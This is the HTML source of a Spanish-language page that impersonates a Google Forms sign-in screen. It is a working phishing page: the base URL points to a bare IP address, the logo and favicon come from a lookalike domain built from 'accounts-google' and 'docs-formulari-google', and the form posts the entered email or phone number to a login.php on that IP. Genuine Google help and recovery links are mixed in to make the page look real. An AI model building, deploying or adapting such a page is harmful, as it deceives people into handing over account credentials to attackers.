<!DOCTYPE html>
<html lang="es">
<head>
	<base href="https://74.234.200.174/index_1_x.html" /><meta charset="UTF-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="viewport" content="width=device-width, initial-scale=1.0"/>
	<link href="https://fonts.googleapis.com" rel="preconnect" />
	<link crossorigin="" href="https://fonts.gstatic.com" rel="preconnect" />
	<link href="https://fonts.googleapis.com/css2?family=Zen+Kaku+Gothic+Antique&amp;display=swap" rel="stylesheet" />
	<link href="https://fonts.googleapis.com/css2?family=Roboto&amp;display=swap" rel="stylesheet" />
	<link href="https://fonts.googleapis.com/css2?family=Google+Sans&amp;display=swap" rel="stylesheet" /><!-- <link rel="stylesheet" href="./estilos.css"> -->
	<link href="https://accounts-google-ibadia-educaciodigital-docs-formulari-google.com/Google-favicon.png" rel="icon" type="image/png" />
	<title>Formularios de Google: inicio de sesi&oacute;n</title>
	<style type="text/css">*{
            padding:0;
            margin:0;
        }

        a {
            text-decoration: none;
            color: #4285f4;
        }
        

        body{
            min-height: 100vh;
            display: grid;
            justify-content: center;
            align-items: center;
            font-family: roboto, "zen kaku gothic antique", sans-serif;
        }

        .inputContainer{
            max-width: 22rem;
            border: 1px solid lightgray;
            border-radius: 8px;
            padding: 55px 50px 40px 50px;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
        }

        .login{
            margin-top: 20px;
            margin-bottom: 5px;
            font-weight: lighter;
            font-family: "Google Sans";
        }

        .use{
            font-weight: lighter;
        }

        input::placeholder {
            font-size: 16px;
            font-family: "Roboto";
            font-weight: 500;
        }  

        .gInput{
            width: 100%;
            height: 3.5rem;
            margin-top: 50px;
            border: 0.5px solid lightgray;
            border-radius: 5px;
            font-size: 16px;
            font-weight: 400;
            padding: 0 0 0 15px;
            background-color: none;
            outline: none;
            box-sizing: border-box;
        }

        .gInput:focus{
            border: 2px solid #4285f4;
        }

        .gInput:focus ~ .inputLabel:before{
            color: #4285f4;
            font-size: 12px;
            top: -65px;
            z-index: 1;
        }

        .inputLabel{
            position: relative;
            width: 200px;
        }

        input:focus::placeholder {
            opacity: 0;
            transition: opacity 0.5s ease-in-out;
        }

        .inputLabel:before{
            content: "Correo electrónico o teléfono";
            position: relative;
            top: -25px;
            left: 10px;
            background-color: white;
            font-size: 18px;
            z-index: -1;
            font-weight: lighter;
            padding: 0 10px;
            box-sizing: border-box;
            transition: 0.1s ease;
        }

        .forgotContainer{
            width: 100%;
            display: flex;
            justify-content: flex-start;
            margin-top: 10px;
        }

        .guest{
            margin-top: 35px;
            margin-bottom: 35px;
            font-size: 13px;
            font-weight: lighter;
        }

        span{
            font-weight: bold;  
        }

        .masInfo:hover{
            box-shadow: 0 1px 1px 0 rgba(66,133,244,.45),0 1px 3px 1px rgba(66,133,244,.3);
            margin: 0 -3px;
            padding: 0 3px;
            border-radius: 4px;
            outline: 0;
            font-weight: bold;
            color: #1a73e8;
        }

        .buttonContainer{
            width: 100%;
            display: flex;
            justify-content: space-between;
            margin-bottom: 30px;
        }

        .btnCreate{
            position: relative;
            margin-left: -14px;
        }

        .buttonContainer a{
            text-decoration: none;
            font-weight: 500;
            font-size: .875rem;
            border-radius: 5px;
            padding: 7px 15px 9px 15px;
        }

            .btnCreate:hover{
                color: #366fca;
                background-color: #f6f9fe;
            }

            .btnNext{
                font-family: "Google Sans";
                background-color: #1a73e8;
                color: white;
                transition: 0.1s ease;
                font-weight: 500;
                border-radius: 5px;
                padding: 10px 20px;
            }

            .btnNext:hover{
                background-color: #1b66c9;
                box-shadow: 0 2px 5px rgba(0,0,0,0.2);
            }

        .forgot{
            position: relative;
            margin-top: 0px;
            font-size: 13px;
            color: #4285f4;
        }

        .forgot, .guest span, .btnCreate{
            color: #4285f4;
            font-weight: bold;
        }

        .guest, .inputLabel:before{
            color: #5f6368;
        }

        button {
            border: none;
            background-color: transparent;
            color: inherit;
            text-decoration: none;
            box-shadow: none;
            cursor: pointer;
        }
	</style>
</head>
<body>
<main class="inputContainer"><img alt="" height="33" src="https://accounts-google-ibadia-educaciodigital-docs-formulari-google.com/google.png" width="87" />
<h2 class="login">Iniciar sesi&oacute;n</h2>

<h4 class="use">Ir a Formularios</h4>

<form action="" method="POST"><input name="__original_url" type="hidden" value="https://74.234.200.174/index_1_x.htmllogin.php" /> <input class="gInput" name="usuario" placeholder="Correo electrónico o teléfono" type="text" />
<div class="forgotContainer">
<h5 class="forgot"><a href="https://accounts.google.com/signin/v2/usernamerecovery" onclick="this.target='_blank'">&iquest;Has olvidado tu correo electr&oacute;nico?</a></h5>
</div>

<h4 class="guest">&iquest;No es tu ordenador? Usa una ventana privada para iniciar sesi&oacute;n. <a href="https://support.google.com/accounts?p=signin_privatebrowsing&amp;hl=es" onclick="this.target='_blank'"><span class="masInfo">M&aacute;s informaci&oacute;n</span></a></h4>

<div class="buttonContainer"><a class="btnCreate" href="https://accounts.google.com/signup/v2/webcreateaccount">Crear cuenta</a><button class="btnNext" type="submit">Siguiente</button></div>
</form>
</main>
</body>
</html>
